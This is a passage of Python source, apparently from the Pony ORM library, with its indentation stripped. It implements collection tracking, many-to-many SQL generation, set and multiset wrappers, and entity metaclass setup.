for obj, in_removed, was_modified_earlier in undo:
setdata = obj._vals_[attr]
setdata.remove(item)
if setdata.count is not None: setdata.count -= 1
if in_removed: setdata.removed.add(item)
else: setdata.added.remove(item)
if not was_modified_earlier: objects_with_modified_collections.remove(obj)
undo_funcs.append(undo_func)
def db_reverse_add(attr, objects, item):
for obj in objects:
setdata = obj._vals_.get(attr)
if setdata is None: setdata = obj._vals_[attr] = SetData()
elif setdata.is_fully_loaded: throw(UnrepeatableReadError,
'Phantom object %s appeared in collection %s.%s' % (safe_repr(item), safe_repr(obj), attr.name))
setdata.add(item)
def reverse_remove(attr, objects, item, undo_funcs):
undo = []
cache = item._session_cache_
objects_with_modified_collections = cache.modified_collections[attr]
for obj in objects:
setdata = obj._vals_.get(attr)
assert setdata is not None
assert item in setdata
if setdata.removed is None: setdata.removed = set()
else: assert item not in setdata.removed
in_added = setdata.added and item in setdata.added
was_modified_earlier = obj in objects_with_modified_collections
undo.append((obj, in_added, was_modified_earlier))
objects_with_modified_collections.add(obj)
setdata.remove(item)
if setdata.count is not None: setdata.count -= 1
if in_added: setdata.added.remove(item)
else: setdata.removed.add(item)
def undo_func():
for obj, in_removed, was_modified_earlier in undo:
setdata = obj._vals_[attr]
setdata.add(item)
if setdata.count is not None: setdata.count += 1
if in_added: setdata.added.add(item)
else: setdata.removed.remove(item)
if not was_modified_earlier: objects_with_modified_collections.remove(obj)
undo_funcs.append(undo_func)
def db_reverse_remove(attr, objects, item):
for obj in objects:
setdata = obj._vals_[attr]
setdata.remove(item)
def get_m2m_columns(attr, is_reverse=False):
reverse = attr.reverse
entity = attr.entity
pk_length = len(entity._get_pk_columns_())
provider = entity._database_.provider
if attr.symmetric or entity is reverse.entity:
if attr._columns_checked:
if not attr.symmetric: return attr.columns
if not is_reverse: return attr.columns
return attr.reverse_columns
if not attr.symmetric: assert not reverse._columns_checked
if attr.columns:
if len(attr.columns) != pk_length: throw(MappingError,
'Invalid number of columns for %s' % reverse)
else: attr.columns = provider.get_default_m2m_column_names(entity)
attr._columns_checked = True
attr.converters = entity._pk_converters_
if attr.symmetric:
if not attr.reverse_columns:
attr.reverse_columns = [ column + '_2' for column in attr.columns ]
elif len(attr.reverse_columns) != pk_length:
throw(MappingError, "Invalid number of reverse columns for symmetric attribute %s" % attr)
return attr.columns if not is_reverse else attr.reverse_columns
else:
if not reverse.columns:
reverse.columns = [ column + '_2' for column in attr.columns ]
reverse._columns_checked = True
reverse.converters = entity._pk_converters_
return attr.columns if not is_reverse else reverse.columns
if attr._columns_checked: return reverse.columns
elif reverse.columns:
if len(reverse.columns) != pk_length: throw(MappingError,
'Invalid number of columns for %s' % reverse)
else: reverse.columns = provider.get_default_m2m_column_names(entity)
reverse.converters = entity._pk_converters_
attr._columns_checked = True
return reverse.columns
def remove_m2m(attr, removed):
assert removed
entity = attr.entity
database = entity._database_
cached_sql = attr.cached_remove_m2m_sql
if cached_sql is None:
reverse = attr.reverse
where_list = [ 'WHERE' ]
if attr.symmetric:
columns = attr.columns + attr.reverse_columns
converters = attr.converters + attr.converters
else:
columns = reverse.columns + attr.columns
converters = reverse.converters + attr.converters
for i, (column, converter) in enumerate(izip(columns, converters)):
where_list.append([ converter.EQ, ['COLUMN', None, column], [ 'PARAM', (i, None, None), converter ] ])
from_ast = [ 'FROM', [ None, 'TABLE', attr.table ] ]
sql_ast = [ 'DELETE', None, from_ast, where_list ]
sql, adapter = database._ast2sql(sql_ast)
attr.cached_remove_m2m_sql = sql, adapter
else: sql, adapter = cached_sql
arguments_list = [ adapter(obj._get_raw_pkval_() + robj._get_raw_pkval_())
for obj, robj in removed ]
database._exec_sql(sql, arguments_list)
def add_m2m(attr, added):
assert added
entity = attr.entity
database = entity._database_
cached_sql = attr.cached_add_m2m_sql
if cached_sql is None:
reverse = attr.reverse
if attr.symmetric:
columns = attr.columns + attr.reverse_columns
converters = attr.converters + attr.converters
else:
columns = reverse.columns + attr.columns
converters = reverse.converters + attr.converters
params = [ [ 'PARAM', (i, None, None), converter ] for i, converter in enumerate(converters) ]
sql_ast = [ 'INSERT', attr.table, columns, params ]
sql, adapter = database._ast2sql(sql_ast)
attr.cached_add_m2m_sql = sql, adapter
else: sql, adapter = cached_sql
arguments_list = [ adapter(obj._get_raw_pkval_() + robj._get_raw_pkval_())
for obj, robj in added ]
database._exec_sql(sql, arguments_list)
@cut_traceback
@db_session(ddl=True)
def drop_table(attr, with_all_data=False):
if attr.reverse.is_collection: table_name = attr.table
else: table_name = attr.entity._table_
attr.entity._database_._drop_tables([ table_name ], True, with_all_data)
def unpickle_setwrapper(obj, attrname, items):
attr = getattr(obj.__class__, attrname)
wrapper_cls = attr.py_type._get_set_wrapper_subclass_()
wrapper = wrapper_cls(obj, attr)
setdata = obj._vals_.get(attr)
if setdata is None: setdata = obj._vals_[attr] = SetData()
setdata.is_fully_loaded = True
setdata.absent = None
setdata.count = len(setdata)
return wrapper
class SetInstance(object):
__slots__ = '_obj_', '_attr_', '_attrnames_'
_parent_ = None
def __init__(wrapper, obj, attr):
wrapper._obj_ = obj
wrapper._attr_ = attr
wrapper._attrnames_ = (attr.name,)
def __reduce__(wrapper):
return unpickle_setwrapper, (wrapper._obj_, wrapper._attr_.name, wrapper.copy())
@cut_traceback
def copy(wrapper):
return wrapper._attr_.copy(wrapper._obj_)
@cut_traceback
def __repr__(wrapper):
return '<%s %r.%s>' % (wrapper.__class__.__name__, wrapper._obj_, wrapper._attr_.name)
@cut_traceback
def __str__(wrapper):
cache = wrapper._obj_._session_cache_
if cache is None or not cache.is_alive: content = '...'
else: content = ', '.join(imap(str, wrapper))
return '%s([%s])' % (wrapper.__class__.__name__, content)
@cut_traceback
def __nonzero__(wrapper):
attr = wrapper._attr_
obj = wrapper._obj_
if obj._status_ in del_statuses: throw_object_was_deleted(obj)
if obj._vals_ is None: throw_db_session_is_over('read value of', obj, attr)
setdata = obj._vals_.get(attr)
if setdata is None: setdata = attr.load(obj)
if setdata: return True
if not setdata.is_fully_loaded: setdata = attr.load(obj)
return bool(setdata)
@cut_traceback
def is_empty(wrapper):
attr = wrapper._attr_
obj = wrapper._obj_
if obj._status_ in del_statuses: throw_object_was_deleted(obj)
if obj._vals_ is None: throw_db_session_is_over('read value of', obj, attr)
setdata = obj._vals_.get(attr)
if setdata is None: setdata = obj._vals_[attr] = SetData()
elif setdata.is_fully_loaded: return not setdata
elif setdata: return False
elif setdata.count is not None: return not setdata.count
entity = attr.entity
reverse = attr.reverse
rentity = reverse.entity
database = entity._database_
cached_sql = attr.cached_empty_sql
if cached_sql is None:
where_list = [ 'WHERE' ]
for i, (column, converter) in enumerate(izip(reverse.columns, reverse.converters)):
where_list.append([ converter.EQ, [ 'COLUMN', None, column ], [ 'PARAM', (i, None, None), converter ] ])
if not reverse.is_collection:
table_name = rentity._table_
select_list, attr_offsets = rentity._construct_select_clause_()
else:
table_name = attr.table
select_list = [ 'ALL' ] + [ [ 'COLUMN', None, column ] for column in attr.columns ]
attr_offsets = None
sql_ast = [ 'SELECT', select_list, [ 'FROM', [ None, 'TABLE', table_name ] ],
where_list, [ 'LIMIT', 1 ] ]
sql, adapter = database._ast2sql(sql_ast)
attr.cached_empty_sql = sql, adapter, attr_offsets
else: sql, adapter, attr_offsets = cached_sql
arguments = adapter(obj._get_raw_pkval_())
cursor = database._exec_sql(sql, arguments)
if reverse.is_collection:
row = cursor.fetchone()
if row is not None:
loaded_item = rentity._get_by_raw_pkval_(row)
setdata.add(loaded_item)
reverse.db_reverse_add((loaded_item,), obj)
else: rentity._fetch_objects(cursor, attr_offsets)
if setdata: return False
setdata.is_fully_loaded = True
setdata.absent = None
setdata.count = 0
return True
@cut_traceback
def __len__(wrapper):
attr = wrapper._attr_
obj = wrapper._obj_
if obj._status_ in del_statuses: throw_object_was_deleted(obj)
if obj._vals_ is None: throw_db_session_is_over('read value of', obj, attr)
setdata = obj._vals_.get(attr)
if setdata is None or not setdata.is_fully_loaded: setdata = attr.load(obj)
return len(setdata)
@cut_traceback
def count(wrapper):
attr = wrapper._attr_
obj = wrapper._obj_
cache = obj._session_cache_
if obj._status_ in del_statuses: throw_object_was_deleted(obj)
if obj._vals_ is None: throw_db_session_is_over('read value of', obj, attr)
setdata = obj._vals_.get(attr)
if setdata is None: setdata = obj._vals_[attr] = SetData()
elif setdata.count is not None: return setdata.count
if cache is None or not cache.is_alive: throw_db_session_is_over('read value of', obj, attr)
entity = attr.entity
reverse = attr.reverse
database = entity._database_
cached_sql = attr.cached_count_sql
if cached_sql is None:
where_list = [ 'WHERE' ]
for i, (column, converter) in enumerate(izip(reverse.columns, reverse.converters)):
where_list.append([ converter.EQ, [ 'COLUMN', None, column ], [ 'PARAM', (i, None, None), converter ] ])
if not reverse.is_collection: table_name = reverse.entity._table_
else: table_name = attr.table
sql_ast = [ 'SELECT', [ 'AGGREGATES', [ 'COUNT', None ] ],
[ 'FROM', [ None, 'TABLE', table_name ] ], where_list ]
sql, adapter = database._ast2sql(sql_ast)
attr.cached_count_sql = sql, adapter
else: sql, adapter = cached_sql
arguments = adapter(obj._get_raw_pkval_())
with cache.flush_disabled():
cursor = database._exec_sql(sql, arguments)
setdata.count = cursor.fetchone()[0]
if setdata.added: setdata.count += len(setdata.added)
if setdata.removed: setdata.count -= len(setdata.removed)
return setdata.count
@cut_traceback
def __iter__(wrapper):
return iter(wrapper.copy())
@cut_traceback
def __eq__(wrapper, other):
if isinstance(other, SetInstance):
if wrapper._obj_ is other._obj_ and wrapper._attr_ is other._attr_: return True
else: other = other.copy()
elif not isinstance(other, set): other = set(other)
items = wrapper.copy()
return items == other
@cut_traceback
def __ne__(wrapper, other):
return not wrapper.__eq__(other)
@cut_traceback
def __add__(wrapper, new_items):
return wrapper.copy().union(new_items)
@cut_traceback
def __sub__(wrapper, items):
return wrapper.copy().difference(items)
@cut_traceback
def __contains__(wrapper, item):
attr = wrapper._attr_
obj = wrapper._obj_
if obj._status_ in del_statuses: throw_object_was_deleted(obj)
if obj._vals_ is None: throw_db_session_is_over('read value of', obj, attr)
if not isinstance(item, attr.py_type): return False
if item._session_cache_ is not obj._session_cache_:
throw(TransactionError, 'An attempt to mix objects belonging to different transactions')
reverse = attr.reverse
if not reverse.is_collection:
obj2 = item._vals_[reverse] if reverse in item._vals_ else reverse.load(item)
wbits = item._wbits_
if wbits is not None:
bit = item._bits_except_volatile_[reverse]
if not wbits & bit: item._rbits_ |= bit
return obj is obj2
setdata = obj._vals_.get(attr)
if setdata is not None:
if item in setdata: return True
if setdata.is_fully_loaded: return False
if setdata.absent is not None and item in setdata.absent: return False
else:
reverse_setdata = item._vals_.get(reverse)
if reverse_setdata is not None and reverse_setdata.is_fully_loaded:
return obj in reverse_setdata
setdata = attr.load(obj, (item,))
if item in setdata: return True
if setdata.absent is None: setdata.absent = set()
setdata.absent.add(item)
return False
@cut_traceback
def create(wrapper, **kwargs):
attr = wrapper._attr_
reverse = attr.reverse
if reverse.name in kwargs: throw(TypeError,
'When using %s.%s.create(), %r attribute should not be passed explicitly'
% (attr.entity.__name__, attr.name, reverse.name))
kwargs[reverse.name] = wrapper._obj_
item_type = attr.py_type
item = item_type(**kwargs)
return item
@cut_traceback
def add(wrapper, new_items):
obj = wrapper._obj_
attr = wrapper._attr_
cache = obj._session_cache_
if cache is None or not cache.is_alive: throw_db_session_is_over('change collection', obj, attr)
if obj._status_ in del_statuses: throw_object_was_deleted(obj)
with cache.flush_disabled():
reverse = attr.reverse
if not reverse: throw(NotImplementedError)
new_items = attr.validate(new_items, obj)
if not new_items: return
setdata = obj._vals_.get(attr)
if setdata is not None: new_items -= setdata
if setdata is None or not setdata.is_fully_loaded:
setdata = attr.load(obj, new_items)
new_items -= setdata
undo_funcs = []
try:
if not reverse.is_collection:
for item in new_items: reverse.__set__(item, obj, undo_funcs)
else: reverse.reverse_add(new_items, obj, undo_funcs)
except:
for undo_func in reversed(undo_funcs): undo_func()
raise
setdata |= new_items
if setdata.count is not None: setdata.count += len(new_items)
added = setdata.added
removed = setdata.removed
if removed: (new_items, setdata.removed) = (new_items-removed, removed-new_items)
if added: added |= new_items
else: setdata.added = new_items # added may be None
cache.modified_collections[attr].add(obj)
cache.modified = True
@cut_traceback
def __iadd__(wrapper, items):
wrapper.add(items)
return wrapper
@cut_traceback
def remove(wrapper, items):
obj = wrapper._obj_
attr = wrapper._attr_
cache = obj._session_cache_
if cache is None or not cache.is_alive: throw_db_session_is_over('change collection', obj, attr)
if obj._status_ in del_statuses: throw_object_was_deleted(obj)
with cache.flush_disabled():
reverse = attr.reverse
if not reverse: throw(NotImplementedError)
items = attr.validate(items, obj)
setdata = obj._vals_.get(attr)
if setdata is not None and setdata.removed:
items -= setdata.removed
if not items: return
if setdata is None or not setdata.is_fully_loaded:
setdata = attr.load(obj, items)
items &= setdata
undo_funcs = []
try:
if not reverse.is_collection:
if attr.cascade_delete:
for item in items: item._delete_(undo_funcs)
else:
for item in items: reverse.__set__(item, None, undo_funcs)
else: reverse.reverse_remove(items, obj, undo_funcs)
except:
for undo_func in reversed(undo_funcs): undo_func()
raise
setdata -= items
if setdata.count is not None: setdata.count -= len(items)
added = setdata.added
removed = setdata.removed
if added: (items, setdata.added) = (items - added, added - items)
if removed: removed |= items
else: setdata.removed = items # removed may be None
cache.modified_collections[attr].add(obj)
cache.modified = True
@cut_traceback
def __isub__(wrapper, items):
wrapper.remove(items)
return wrapper
@cut_traceback
def clear(wrapper):
obj = wrapper._obj_
attr = wrapper._attr_
cache = obj._session_cache_
if cache is None or not obj._session_cache_.is_alive: throw_db_session_is_over('change collection', obj, attr)
if obj._status_ in del_statuses: throw_object_was_deleted(obj)
attr.__set__(obj, ())
@cut_traceback
def load(wrapper):
wrapper._attr_.load(wrapper._obj_)
@cut_traceback
def select(wrapper, *args):
obj = wrapper._obj_
if obj._status_ in del_statuses: throw_object_was_deleted(obj)
attr = wrapper._attr_
reverse = attr.reverse
query = reverse.entity._select_all()
s = 'lambda item: JOIN(obj in item.%s)' if reverse.is_collection else 'lambda item: item.%s == obj'
query = query.filter(s % reverse.name, {'obj' : obj, 'JOIN': JOIN})
if args:
func, globals, locals = get_globals_and_locals(args, kwargs=None, frame_depth=cut_traceback_depth+1)
query = query.filter(func, globals, locals)
return query
filter = select
def limit(wrapper, limit=None, offset=None):
return wrapper.select().limit(limit, offset)
def page(wrapper, pagenum, pagesize=10):
return wrapper.select().page(pagenum, pagesize)
def order_by(wrapper, *args):
return wrapper.select().order_by(*args)
def sort_by(wrapper, *args):
return wrapper.select().sort_by(*args)
def random(wrapper, limit):
return wrapper.select().random(limit)
def unpickle_multiset(obj, attrnames, items):
entity = obj.__class__
for name in attrnames:
attr = entity._adict_[name]
if attr.reverse: entity = attr.py_type
else:
entity = None
break
if entity is None: multiset_cls = Multiset
else: multiset_cls = entity._get_multiset_subclass_()
return multiset_cls(obj, attrnames, items)
class Multiset(object):
__slots__ = [ '_obj_', '_attrnames_', '_items_' ]
@cut_traceback
def __init__(multiset, obj, attrnames, items):
multiset._obj_ = obj
multiset._attrnames_ = attrnames
if type(items) is dict: multiset._items_ = items
else: multiset._items_ = utils.distinct(items)
def __reduce__(multiset):
return unpickle_multiset, (multiset._obj_, multiset._attrnames_, multiset._items_)
@cut_traceback
def distinct(multiset):
return multiset._items_.copy()
@cut_traceback
def __repr__(multiset):
cache = multiset._obj_._session_cache_
if cache is not None and cache.is_alive:
size = builtins.sum(itervalues(multiset._items_))
if size == 1: size_str = ' (1 item)'
else: size_str = ' (%d items)' % size
else: size_str = ''
return '<%s %r.%s%s>' % (multiset.__class__.__name__, multiset._obj_,
'.'.join(multiset._attrnames_), size_str)
@cut_traceback
def __str__(multiset):
items_str = '{%s}' % ', '.join('%r: %r' % pair for pair in sorted(iteritems(multiset._items_)))
return '%s(%s)' % (multiset.__class__.__name__, items_str)
@cut_traceback
def __nonzero__(multiset):
return bool(multiset._items_)
@cut_traceback
def __len__(multiset):
return builtins.sum(multiset._items_.values())
@cut_traceback
def __iter__(multiset):
for item, cnt in iteritems(multiset._items_):
for i in xrange(cnt): yield item
@cut_traceback
def __eq__(multiset, other):
if isinstance(other, Multiset):
return multiset._items_ == other._items_
if isinstance(other, dict):
return multiset._items_ == other
if hasattr(other, 'keys'):
return multiset._items_ == dict(other)
return multiset._items_ == utils.distinct(other)
@cut_traceback
def __ne__(multiset, other):
return not multiset.__eq__(other)
@cut_traceback
def __contains__(multiset, item):
return item in multiset._items_
##class List(Collection): pass
##class Dict(Collection): pass
##class Relation(Collection): pass
class EntityIter(object):
def __init__(self, entity):
self.entity = entity
def next(self):
throw(TypeError, 'Use select(...) function or %s.select(...) method for iteration'
% self.entity.__name__)
if not PY2: __next__ = next
entity_id_counter = itertools.count(1)
new_instance_id_counter = itertools.count(1)
select_re = re.compile(r'select\b', re.IGNORECASE)
lambda_re = re.compile(r'lambda\b')
class EntityMeta(type):
def __new__(meta, name, bases, cls_dict):
if 'Entity' in globals():
if '__slots__' in cls_dict: throw(TypeError, 'Entity classes cannot contain __slots__ variable')
cls_dict['__slots__'] = ()
return super(EntityMeta, meta).__new__(meta, name, bases, cls_dict)
@cut_traceback
def __init__(entity, name, bases, cls_dict):
super(EntityMeta, entity).__init__(name, bases, cls_dict)
entity._database_ = None
if name == 'Entity': return
if not entity.__name__[:1].isupper():
throw(ERDiagramError, 'Entity class name should start with a capital letter. Got: %s' % entity.__name__)
databases = set()
for base_class in bases:
if isinstance(base_class, EntityMeta):
database = base_class._database_
if database is None: throw(ERDiagramError, 'Base Entity does not belong to any database')
databases.add(database)
if not databases: assert False # pragma: no cover
elif len(databases) > 1: throw(ERDiagramError,
'With multiple inheritance of entities, all entities must belong to the same database')
database = databases.pop()
if entity.__name__ in database.entities:
throw(ERDiagramError, 'Entity %s already exists' % entity.__name__)
assert entity.__name__ not in database.__dict__
if database.schema is not None: throw(ERDiagramError,
'Cannot define entity %r: database mapping has already been generated' % entity.__name__)
entity._database_ = database
entity._id_ = next(entity_id_counter)
direct_bases = [ c for c in entity.__bases__ if issubclass(c, Entity) and c.__name__ != 'Entity' ]
entity._direct_bases_ = direct_bases
all_bases = entity._all_bases_ = set()
entity._subclasses_ = set()
for base in direct_bases:
all_bases.update(base._all_bases_)
all_bases.add(base)
for base in all_bases:
base._subclasses_.add(entity)
if direct_bases:
root = entity._root_ = direct_bases[0]._root_
for base in direct_bases[1:]:
if base._root_ is not root: throw(ERDiagramError, 'Multiple inheritance graph must be diamond-like. '
"Entity %s inherits from %s and %s entities which don't have common base class."
% (name, root.__name__, base._root_.__name__))
if root._discriminator_attr_ is None:
assert root._discriminator_ is None
Discriminator.create_default_attr(root)
else:
entity._root_ = entity
entity._discriminator_attr_ = None
base_attrs = []
base_attrs_dict = {}
for base in direct_bases:
for a in base._attrs_:
prev = base_attrs_dict.get(a.name)
if prev is None:
base_attrs_dict[a.name] = a
base_attrs.append(a)
elif prev is not a: throw(ERDiagramError,
'Attribute "%s" clashes with attribute "%s" in derived entity "%s"'
% (prev, a, entity.__name__))
entity._base_attrs_ = base_attrs
new_attrs = []
for name, attr in items_list(entity.__dict__):
if name in base_attrs_dict: throw(ERDiagramError, "Name '%s' hides base attribute %s" % (name,base_attrs_dict[name]))
if not isinstance(attr, Attribute): continue
if name.startswith('_') and name.endswith('_'): throw(ERDiagramError,
'Attribute name cannot both start and end with underscore. Got: %s' % name)
if attr.entity is not None: throw(ERDiagramError,
'Duplicate use of attribute %s in entity %s' % (attr, entity.__name__))
attr._init_(entity, name)
new_attrs.append(attr)
new_attrs.sort(key=attrgetter('id'))
indexes = entity._indexes_ = entity.__dict__.get('_indexes_', [])
for attr in new_attrs:
if attr.is_unique: indexes.append(Index(attr, is_pk=isinstance(attr, PrimaryKey)))
for index in indexes: index._init_(entity)
primary_keys = {index.attrs for index in indexes if index.is_pk}
if direct_bases:
if primary_keys: throw(ERDiagramError, 'Primary key cannot be redefined in derived classes')
base_indexes = []
for base in direct_bases:
for index in base._indexes_:
if index not in base_indexes and index not in indexes: base_indexes.append(index)
indexes[:0] = base_indexes
primary_keys = {index.attrs for index in indexes if index.is_pk}
if len(primary_keys) > 1: throw(ERDiagramError, 'Only one primary key can be defined in each entity class')
elif not primary_keys:
if hasattr(entity, 'id'): throw(ERDiagramError,
"Cannot create default primary key attribute for %s because name 'id' is already in use."
" Please create a PrimaryKey attribute for entity %s or rename the 'id' attribute"
% (entity.__name__, entity.__name__))
attr = PrimaryKey(int, auto=True)
attr.is_implicit = True
attr._init_(entity, 'id')
entity.id = attr
new_attrs.insert(0, attr)
pk_attrs = (attr,)
index = Index(attr, is_pk=True)
indexes.insert(0, index)
index._init_(entity)
else: pk_attrs = primary_keys.pop()
for i, attr in enumerate(pk_attrs): attr.pk_offset = i
entity._pk_columns_ = None
entity._pk_attrs_ = pk_attrs
entity._pk_is_composite_ = len(pk_attrs) > 1
entity._pk_ = pk_attrs if len(pk_attrs) > 1 else pk_attrs[0]
entity._keys_ = [ index.attrs for index in indexes if index.is_unique and not index.is_pk ]
entity._simple_keys_ = [ key[0] for key in entity._keys_ if len(key) == 1 ]
entity._composite_keys_ = [ key for key in entity._keys_ if len(key) > 1 ]
entity._new_attrs_ = new_attrs
entity._attrs_ = base_attrs + new_attrs
entity._adict_ = {attr.name: attr for attr in entity._attrs_}
entity._subclass_attrs_ = []
entity._subclass_adict_ = {}
for base in entity._all_bases_:
for attr in new_attrs:
if attr.is_collection: continue
prev = base._subclass_adict_.setdefault(attr.name, attr)
if prev is not attr: throw(ERDiagramError,
'Attribute %s conflicts with attribute %s because both entities inherit from %s. '
'To fix this, move attribute definition to base class'
% (attr, prev, entity._root_.__name__))
base._subclass_attrs_.append(attr)
entity._attrnames_cache_ = {}
try: table_name = entity.__dict__['_table_']
except KeyError: entity._table_ = None
else:
if not isinstance(table_name, basestring):
if not isinstance(table_name, (list, tuple)): throw(TypeError,
'%s._table_ property must be a string. Got: %r' % (entity.__name__, table_name))
for name_part in table_name:
if not isinstance(name_part, basestring):throw(TypeError,
'Each part of table name must be a string. Got: %r' % name_part)
entity._table_ = table_name = tuple(table_name)
database.entities[entity.__name__] = entity
setattr(database, entity.__name__, entity)
entity._cached_max_id_sql_ = None
entity._find_sql_cache_ = {}
entity._load_sql_cache_ = {}
entity._batchload_sql_cache_ = {}
entity._insert_sql_cache_ = {}
entity._update_sql_cache_ = {}
entity._delete_sql_cache_ = {}
entity._propagation_mixin_ = None
entity._set_wrapper_subclass_ = None
entity._multiset_subclass_ = None
if '_discriminator_' not in entity.__dict__:
entity._discriminator_ = None
if entity._discriminator_ is not None and not entity._discriminator_attr_:
Discriminator.create_default_attr(entity)
if entity._discriminator_attr_:
entity._discriminator_attr_.process_entity_inheritance(entity)
iter_name = entity._default_iter_name_ = (
''.join(letter for letter in entity.__name__ if letter.isupper()).lower()
or entity.__name__
)
for_expr = ast.GenExprFor(ast.AssName(iter_name, 'OP_ASSIGN'), ast.Name('.0'), [])
inner_expr = ast.GenExprInner(ast.Name(iter_name), [ for_expr ])
entity._default_genexpr_ = inner_expr
entity._access_rules_ = defaultdict(set)
def _initialize_bits_(entity):
entity._bits_ = {}
entity._bits_except_volatile_ = {}
offset_counter = itertools.count()
all_bits = all_bits_except_volatile = 0
for attr in entity._attrs_:
if attr.is_collection or attr.is_discriminator or attr.pk_offset is not None: bit = 0
elif not attr.columns: bit = 0
else: bit = 1 << next(offset_counter)
all_bits |= bit
entity._bits_[attr] = bit
if attr.is_volatile: bit = 0
all_bits_except_volatile |= bit
entity._bits_except_volatile_[attr] = bit
entity._all_bits_ = all_bits
entity._all_bits_except_volatile_ = all_bits_except_volatile
def _resolve_attr_types_(entity):
database = entity._database_
for attr in entity._new_attrs_:
py_type = attr.py_type
if isinstance(py_type, basestring):
rentity = database.entities.get(py_type)
if rentity is None:
throw(ERDiagramError, 'Entity definition %s was not found' % py_type)
attr.py_type = py_type = rentity
elif isinstance(py_type, types.FunctionType):
rentity = py_type()
if not isinstance(rentity, EntityMeta): throw(TypeError,
'Invalid type of attribute %s: expected entity class, got %r' % (attr, rentity))
attr.py_type = py_type = rentity
if isinstance(py_type, EntityMeta) and py_type.__name__ == 'Entity': throw(TypeError,
'Cannot link attribute %s to abstract Entity class. Use specific Entity subclass instead' % attr)
def _link_reverse_attrs_(entity):
database = entity._database_
for attr in entity._new_attrs_:
py_type = attr.py_type
if not issubclass(py_type, Entity): continue
entity2 = py_type
if entity2._database_ is not database:
throw(ERDiagramError, 'Interrelated entities must belong to same database. '
'Entities %s and %s belongs to different databases'
% (entity.__name__, entity2.__name__))
reverse = attr.reverse
if isinstance(reverse, basestring):
attr2 = getattr(entity2, reverse, None)
if attr2 is None: throw(ERDiagramError, 'Reverse attribute %s.%s not found' % (entity2.__name__, reverse))
elif isinstance(reverse, Attribute):
attr2 = reverse
if attr2.entity is not entity2: throw(ERDiagramError, 'Incorrect reverse attribute %s used in %s' % (attr2, attr)) ###
elif reverse is not None: throw(ERDiagramError, "Value of 'reverse' option must be string. Got: %r" % type(reverse))
else:
candidates1 = []
candidates2 = []
for attr2 in entity2._new_attrs_:
if attr2.py_type not in (entity, entity.__name__): continue
reverse2 = attr2.reverse
if reverse2 in (attr, attr.name): candidates1.append(attr2)
elif not reverse2:
if attr2 is attr: continue
candidates2.append(attr2)
msg = "Ambiguous reverse attribute for %s. Use the 'reverse' parameter for pointing to right attribute"
if len(candidates1) > 1: throw(ERDiagramError, msg % attr)
elif len(candidates1) == 1: attr2 = candidates1[0]
elif len(candidates2) > 1: throw(ERDiagramError, msg % attr)
elif len(candidates2) == 1: attr2 = candidates2[0]
else: throw(ERDiagramError, 'Reverse attribute for %s not found' % attr)
type2 = attr2.py_type
if type2 != entity:
throw(ERDiagramError, 'Inconsistent reverse attributes %s and %s' % (attr, attr2))
reverse2 = attr2.reverse
if reverse2 not in (None, attr, attr.name):
throw(ERDiagramError, 'Inconsistent reverse attributes %s and %s' % (attr, attr2))
if attr.is_required and attr2.is_required: throw(ERDiagramError,
"At least one attribute of one-to-one relationship %s - %s must be optional" % (attr, attr2))
attr.reverse = attr2
attr2.reverse = attr
attr.linked()
attr2.linked()
def _check_table_options_(entity):
if entity._root_ is not entity:
if '_table_options_' in entity.__dict__: throw(TypeError,
'Cannot redefine %s options in %s entity' % (entity._root_.__name__, entity.__name__))
elif not hasattr(entity, '_table_options_'):
entity._table_options_ = {}
def _get_pk_columns_(entity):
if entity._pk_columns_ is not None: return entity._pk_columns_
pk_columns = []
pk_converters = []
pk_paths = []
for attr in entity._pk_attrs_:
attr_columns = attr.get_columns()
attr_col_paths = attr.col_paths
attr.pk_columns_offset = len(pk_columns)
pk_columns.extend(attr_columns)
pk_converters.extend(attr.converters)
pk_paths.extend(attr_col_paths)
entity._pk_columns_ = pk_columns
entity._pk_converters_ = pk_converters
entity._pk_nones_ = (None,) * len(pk_columns)
entity._pk_paths_ = pk_paths
return pk_columns
def __iter__(entity):
return EntityIter(entity)
@cut_traceback
def __getitem__(entity, key):
if type(key) is not tuple: key = (key,)
if len(key) != len(entity._pk_attrs_):
throw(TypeError, 'Invalid count of attrs in %s primary key (%s instead of %s)'
% (entity.__name__, len(key), len(entity._pk_attrs_)))
kwargs = {attr.name: value for attr, value in izip(entity._pk_attrs_, key)}
return entity._find_one_(kwargs)
@cut_traceback
def exists(entity, *args, **kwargs):
if args: return entity._query_from_args_(args, kwargs, frame_depth=cut_traceback_depth+1).exists()
try: obj = entity._find_one_(kwargs)
except ObjectNotFound: return False
except MultipleObjectsFoundError: return True
return True
@cut_traceback
def get(entity, *args, **kwargs):
if args: return entity._query_from_args_(args, kwargs, frame_depth=cut_traceback_depth+1).get()
try: return entity._find_one_(kwargs) # can throw MultipleObjectsFoundError
except ObjectNotFound: return None
@cut_traceback
def get_for_update(entity, *args, **kwargs):
nowait = kwargs.pop('nowait', False)
if args: return entity._query_from_args_(args, kwargs, frame_depth=cut_traceback_depth+1).for_update(nowait).get()
try: return entity._find_one_(kwargs, True, nowait) # can throw MultipleObjectsFoundError
except ObjectNotFound: return None
@cut_traceback
def get_by_sql(entity, sql, globals=None, locals=None):
objects = entity._find_by_sql_(1, sql, globals, locals, frame_depth=cut_traceback_depth+1) # can throw MultipleObjectsFoundError
if not objects: return None
assert len(objects) == 1
return objects[0]
@cut_traceback
def select(entity, *args):
return entity._query_from_args_(args, kwargs=None, frame_depth=cut_traceback_depth+1)
@cut_traceback
def select_by_sql(entity, sql, globals=None, locals=None):
return entity._find_by_sql_(None, sql, globals, locals, frame_depth=cut_traceback_depth+1)
@cut_traceback
def select_random(entity, limit):
if entity._pk_is_composite_: return entity.select().random(limit)
pk = entity._pk_attrs_[0]
if not issubclass(pk.py_type, int) or entity._discriminator_ is not None and entity._root_ is not entity:
return entity.select().random(limit)
database = entity._database_
cache = database._get_cache()
if cache.modified: cache.flush()
max_id = cache.max_id_cache.get(pk)
if max_id is None:
max_id_sql = entity._cached_max_id_sql_
if max_id_sql is None:
sql_ast = [ 'SELECT', [ 'AGGREGATES', [ 'MAX', None, [ 'COLUMN', None, pk.column ] ] ],
[ 'FROM', [ None, 'TABLE', entity._table_ ] ] ]
max_id_sql, adapter = database._ast2sql(sql_ast)
entity._cached_max_id_sql_ = max_id_sql
cursor = database._exec_sql(max_id_sql)
max_id = cursor.fetchone()[0]
cache.max_id_cache[pk] = max_id
if max_id is None: return []
if max_id <= limit * 2: return entity.select().random(limit)
cache_index = cache.indexes[entity._pk_attrs_]
result = []
tried_ids = set()
found_in_cache = False
for i in xrange(5):
ids = []
n = (limit - len(result)) * (i+1)
for j in xrange(n * 2):
id = randint(1, max_id)
if id in tried_ids: continue
if id in ids: continue
obj = cache_index.get(id)
if obj is not None:
